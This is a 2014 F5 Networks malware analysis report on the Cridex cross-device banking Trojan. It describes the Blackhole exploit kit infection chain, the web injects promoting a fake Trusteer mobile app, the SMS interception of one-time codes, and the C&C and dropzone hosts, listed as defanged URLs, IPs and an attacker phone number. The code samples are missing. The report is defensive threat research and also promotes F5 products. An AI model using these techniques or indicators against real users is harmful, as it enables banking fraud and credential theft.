rprt sec 17954 malware analysis 23
TRANSCRIPT
Malware Analysis Report January 2014
Cridex Cross-device Malware PROPRIETARY & CONFIDENTIAL The material in this report is strictly confidential and contains proprietary information and ideas of F5 INC. It should not be provided to anyone without written consent from F5 INC
2
REPORT
Malware Analysis
Contents
Introduction .............................................................................................................................................................................. 3
The Threat ................................................................................................................................................................................ 4
Trojans ..................................................................................................................................................................................... 4
Script injections ...................................................................................................................................................................... 4
Summary of the Attack............................................................................................................................................................ 5
Infection Details ...................................................................................................................................................................... 6
Blackhole Origins .................................................................................................................................................................... 6
Analysis of the EXE file ........................................................................................................................................................... 11
Anti-Virus Scanning Results .................................................................................................................................................. 12
Cridex Configurations.............................................................................................................................................................. 14
The Injected Code ................................................................................................................................................................. 18
Infected User Interaction ......................................................................................................................................................... 20
Details and Detection Ratio ................................................................................................................................................... 27
Anti – Virus Scanning Results ............................................................................................................................................... 27
Required Permissions ........................................................................................................................................................... 29
Attack Takedown ................................................................................................................................................................... 30
Counter- measures ................................................................................................................................................................. 32
Appendix—F5’s solution .......................................................................................................................................................... 33
3
REPORT
Malware Analysis
Introduction F5 eliminates online identity theft by preventing phishing, Trojan and pharming attacks in
real time, through the implementation of advanced encryption and identification
mechanisms. F5 offers products and services that complement existing anti-fraud
technologies, improving the clients’ protection against the aforementioned malicious
activity and providing an encompassing defense mechanism. F5 Securi ty products are
customized to the needs of each client individually.
F5 enables financial organizations working online to gain control over areas that were
virtually unreachable and indefensible up till now, and neutralize local threats found on their
clients’ personal computers, without requiring the installation of software on the end user
side. The transparent solution does not alter the user experience in any way, facilitating a
seamless installation on the firm’s web sites.
F5’s one-of-a-kind solution has proven its exceptional effectiveness time and again in a
large number of financial institutions worldwide, helping them prevent harm to their brand
image and avoid significant economic damage.
Furthermore, F5 provides professional services and advanced research capabilities in the
field of cybercrime including malware, Trojan horses, viruses etc.
4
REPORT
Malware Analysis
The Threat
Trojans
Trojans are malware that appears to the user, to perform a desirable function but (perhaps
in addition to the expected function) steals information or harms the system.
Two main techniques used by Trojans in order to steal the users’ credentials or initiate money
transactions on their behalf are:
• Modifying the website’s client side webpage.
• Sniffing the browser’s activity for information which is sent to different banks,
before the packets are encrypted by SSL.
F5’s knowledge is based on extensive research into the several forms of Trojan infections,
experience with cleaning infections and repairing the damage caused by zero-day threats.
Our deep understanding of how the malware works is the key to producing the right
defense mechanisms required to safeguard the information transmitted between the client
and the organization.
Script injections
Recently several eBanking Trojan horses (i.e Zeus, Cridex, Citadel) started using script
injection techniques in order to modify the original web page. The modification may enable
the attacker to perform money transactions using the victimized users’ credentials. This
may be perpetrated by a Trojan horse injecting a malicious JavaScript code to the client’s
browser, once the client is connected to the website. The code that is injected performs
different functions, including attempting a money transfer from the client’s account.
In order to maintain the information sent by the Trojans, the attackers have developed
different types of command and control systems that enable them to grab and manage the
information sent by the Trojan. The systems are usually PHP based systems accompanied
by an SQL database.
5
REPORT
Malware Analysis
Summary of the Attack The attack is made in order to infect users’ devices with a cross-device Cridex eBanking
Trojan. The user is utilizing a few known methods in order to overcome the user’s ability to
detect the attack and to bypass the need of the user to confirm the installation of the Trojan.
The stages of the attack:
1. The user receives an email from the attacker containing a link.
2. The user clicks on the link.
3. The browser is requesting a page from a remote Blackhole exploit kit.
4. The Blackhole exploit kit scans the user’s browser for vulnerabilities and injects
the page with a PDF file.
5. The PDF file running on the user’s browser downloads the Trojan and installs it on
the user’s machine utilizing an Adobe Acrobat Reader vulnerability.
6. Once entering his eBanking account, the user asked to enter his smartphone
number.
7. A link is sent to the user device asking him to install a malicious application.
8. The user’s submitted credentials and personal information are captured by the
Trojan and sent to a remote DropZone and at the same time automatic
monetary transaction initiated by the attacker
6
REPORT
Malware Analysis
Infection Details Blackhole Origins This is the blackhole origin and infectious pages:
URL: hxxp://kaarqo.releasesmanaged.com.au/TARGETED_BANK/
IP: 69.197.18.174
Country of origin: United Sates of America
URL: hxxp://ftegu9.votersparty.net/TARGETED_BANK/
IP: 208.70.150.9
Country of origin: United Sates of America
URL: hxxp://5b0y1y.siens.com.br/TARGETED_BANK/
IP: 186.215.182.21
Country of origin: Brazil
URL: hxxp://tryidon.ru/TARGETED_BANK/
IP: 5.254.96.215
Country of origin: Romania
URL: hxxp://motott.ru/TARGETED_BANK/
IP: 5.254.96.215
Country of origin: Romania
URL: hxxp://vkokoi.ru/TARGETED_BANK/
IP: 5.254.96.215
Country of origin: Romania
URL: hxxp://basanaj.ru/TARGETED_BANK/
IP: 5.254.96.215
Country of origin: Romania
URL: hxxp://byuhera.ru/TARGETED_BANK/
IP: 5.254.96.218
Country of origin: Romania
7
REPORT
Malware Analysis
The Email Sent To the Victim Sample of one, out of many, infection e-mails sent by the attacker to a distribution list gathered online:
The user click on the link and
download a ZIP file
8
REPORT
Malware Analysis
ZIP file name: "Weitere_Informationen_zum_Transaktions_TARGETED_BANK"
The user installs the malicious
executable file
9
REPORT
Malware Analysis
Once the user click on the PDF file, an obfuscated JavaScript is running in the
system. The JavaScript runs a page of the infamous Blackhole exploit kit, which
leads to the installation of the Trojan horse on the user's system thought an
Acrobat reader vulnerability exploit.
Once that PHP is running on the user's browser, his system is scanned for browser
vulnerabilities and the user is injected with a payload –infected PDF file.
Sample from the code:
10
REPORT
Malware Analysis
11
REPORT
Malware Analysis
Analysis of the EXE file
Properties
12
REPORT
Malware Analysis
Anti-Virus Scanning Results
13
REPORT
Malware Analysis
Executing the EXE file will reveal that it is indeed a variant of the Cridex Banking Trojan.
Severity: HIGH
The following malware is a password-stealing Trojan equipped with the following features:
• Known for installing fake SSL certificates to mislead users in SSL transactions.
• Data capturing ability—including banking passwords.
• Opening a new TCP port connection to send the information.
• HTML injections.
• Stealing the victim’s computer information:
• IMAP/POP3/SMTP username, passwords, server information from mail clients.
• Bookmarks.
• E-mail addresses from the Windows Address Book.
14
REPORT
Malware Analysis
Cridex Configurations
The Cridex Trojan is a MITB type of Trojan that is able to detect the website the user is
visiting and inject the dedicated code to the user’s web browser. It also has the ability to
capture the user’s submitted information and forms and deliver it to the attacker’s dropzone.
In order to infect the user, the EXE file is known to be sent via email spam such as UPS fake
orders, postal services, Groupon and many more. Once the user downloads the EXE and
executes it, the Trojan is activated and it installs itself on the victim’s machine.
The Trojan also modifies the victim’s registry; the new values also include the Trojan’s
configuration file. The set value is hexadecimal and can be de-obfuscated.
Sample of the obfuscated configuration file:
15
REPORT
Malware Analysis
Sample of the de-obfuscated configuration file:
As can be seen in the de-obfuscated code above, the Trojan target vast amount of financial institutions worldwide.
16
REPORT
Malware Analysis
The C&C of Trojan can be seen while monitoring the traffic: hxxp://portasible.ru/BUYee/+jHKSCAAAA/xyVpBAAAAA
DNS Query: portasible.ru
The server’s IP: 37.235.48.69
Whois information
The DropZone can detected in the injected code:
17
REPORT
Malware Analysis
DNS Query: tstore.mobi
The server’s IP 37.235.53.202
The information captured by the Trojan is saved on a local log file of the Trojan and delivered
to the attacker's DropZone. The saved logs include the saved webpage (coded by base64),
the captured URLs and all of the submitted information.
18
REPORT
Malware Analysis
The Injected Code As the Trojan is a generic one that attacks vast amount of financial institutions worldwide it includes couple of JavaScripts that only few will be activated depends on the user eBanking account.
Not as seen before with this kind of Trojan variants, the code is injected into internal webpages of the bank and NOT into the login page loaded by the user at the beginning of the session.
Below is a sample of the injected code. Each JavaScript is triggered by the browser depends on the targeted internal URL.
19
REPORT
Malware Analysis
The injected code is communicating with another malicious server located at:
DNS Query: start-ssecurity.com
The server’s IP 62.75.196.133
20
REPORT
Malware Analysis
Infected User Interaction
Once the user ends the login session and entered his eBanking account the Trojan inject the
relevant code according to the relevant financial institution. This specific Trojan is modified to
use IBM recent security company acquisition – Trusteer – to make the users think that the
bank started to use Trusteer security solutions and ask them to download the company
security mobile application .
21
REPORT
Malware Analysis
1) The user sees the bank notification regarding “the new security solution” and asked to
download an application to his mobile device.
2) Clicking on the ‘DOWNLOAD’ button will pop up a new notification asking the user to enter his
phone number and choose his mobile device
22
REPORT
Malware Analysis
3) The user receive an SMS to his smartphone, contains a link to download the
application.
hxxp://mobiletrusteer.mobi/TARGETED_BANK.apk
4) Clicking the SMS link will install the malicious application on the user smartphone, then
the user is asked to activate it by enabling administrator permissions to the mobile
Trojan.
23
REPORT
Malware Analysis
On being launched, the application sends an SMS message to the attacker mobile number:
+447781470730
5) A window is displayed to the user as he is requested to enter his password and
password verification
24
REPORT
Malware Analysis
When the user clicks the submit button, the application compares between the password and
the password verification field without sending any data to the attacker. In case of a match, the
user will see on his smartphone the confirmation code screen.
6) The victim "confirmation code":
25
REPORT
Malware Analysis
Then, the user is asked to enter it in the website as seen below:
The Trojan completes the process by displaying a messages on the victims’ computer
informing him of the completion of the “security” upgrade and that they can proceed to
his online eBanking activities.
Additional information
Once the application is installed on the device, every incoming SMS message is being
scanned by the application (mobile Trojan).
When the user receives an SMS message in the format "random&&time", the
application saves the time parameter and within this time range, delivers all the
incoming SMS messages to the attacker while it is unknown to the victim
In order to stop this message forwarding process, the attacker sends an SMS message
in the format - “DELETE" to the user's phone.
26
REPORT
Malware Analysis
The SMS Parser processes:
Last stage of the attack
The JavaScript running on the victim's computer receives the TAN/OTP and completes
the transaction. The TAN is pulled from storage by the computer Trojan which in turn
sends it to the bank to complete the illicit transfer of money out of a bank customer’s
account and into the attacker’s “mule” account. The customer’s screen does not show
any of this activity and they are completely unaware of the fraudulent action that just
took place.
27
REPORT
Malware Analysis
Details and Detection Ratio
Anti – Virus Scanning Results
Only 21 Anti-Viruses out of 46 detected the Cridex cross-device Trojan as a malicious application. The full scan results are as following:
28
REPORT
Malware Analysis
29
REPORT
Malware Analysis
Required Permissions Once activated by the user on his smartphone, the attacker have administrator permission on the victims’ device. Therefore he is able to control vast amount of functions such as:
1. Send/receive SMS messages using the victims’ mobile phone number.
2. Have internet access through victims’ mobile.
3. Control incoming & outgoing direct phone calls.
4. Move between WIFI networks.
5. Change the phone states.
6. Delete/modify SD card contents.
7. Read contact list data.
8. Record any audio of the device.
30
REPORT
Malware Analysis
Attack Takedown Couple of hours since the first notification received, F5 Security Operation Center commenced shutdown to the attack. In a very short time frame, all attack resources was blocked. APK resource after SOC shutdown: Script resource after SOC shutdown:
31
REPORT
Malware Analysis
Script resource after SOC shutdown: Trojan C&C after SOC shutdown:
All executable files resources were shut down as well.
32
REPORT
Malware Analysis
Counter measures 1. Educate your users not to open or click on unknown/unexpected email links.
2. Implement an antivirus solution for your organization and protect your end users.
Don’t forget to keep it up to date and to update it.
3. Patch your end user, make sure their software is updated, including browsers, JAVA,
Flash, PDF readers, and all of the Microsoft software.
4. Limit your users’ accounts, not everybody has to be an administrator.
5. Apply strict web content filters on the users’ browsers.
6. Implement a mail scanning solution.
7. Implement F5 WebSafe & MobileSafe to detect infected users entering your web page
and mitigate the Trojans.
For more useful tips contact your local F5 Networks account manager.
33
REPORT
Malware Analysis
Appendix—F5’s solution
Real time identification of
affected users
The WebSafe/MobileSafe contains code to detect duplicated
communications, a sure sign that the user is affected by a Trojan
and that the information provided by it to the bank is also sent to
an unauthorized drop zone.
Identification of malicious
script injection
Once downloaded to the client’s browser, the WebSafe/MobileSafe
makes sure there has been no change to the site’s HTML. In case
such a change is detected—the bank is notified immediately.
Protection against
Trojan-generated money
transfers
The combination of recognizing affected users, encrypting
information, and recognizing malicious script is a key element in
disabling Trojans from performing unauthorized actions within the
account. The WebSafe/MobileSafe component detects the automatic
attempts and is able to intercept them.
Malware research F5 has a dedicated Trojan and malware R&D team that searches
for new threats and new versions of existing ones. The team also
analyzes the programming techniques and methodologies used
to develop the malware in order to keep the F5 line of products
up to date and effective against any threat.
Authors Adir Tzadok
Security Operation Center Analyst Itzik Chimino
Security Operation Center Team Leader Ilan Meller
Security Operation Center Manager
F5 Networks, Inc. 401 Elliott Avenue West, Seattle, WA 98119 888-882-4447 www.f5.com
F5 Networks, Inc.
Corporate Headquarters
F5 Networks
Asia-Pacific
F5 Networks Ltd.
Europe/Middle-East/Africa
F5 Networks
Japan K.K.
©2014 F5 Networks, Inc. All rights reserved. F5, F5 Networks, and the F5 logo are trademarks of F5 Networks, Inc. in the U.S. and in certain other countries. Other F5 trademarks are identified at f5.com.
Any other products, services, or company names referenced herein may be trademarks of their respective owners with no endorsement or affiliation, express or implied, claimed by F5. 01/14
RPRT-SEC-17954-malware-analysis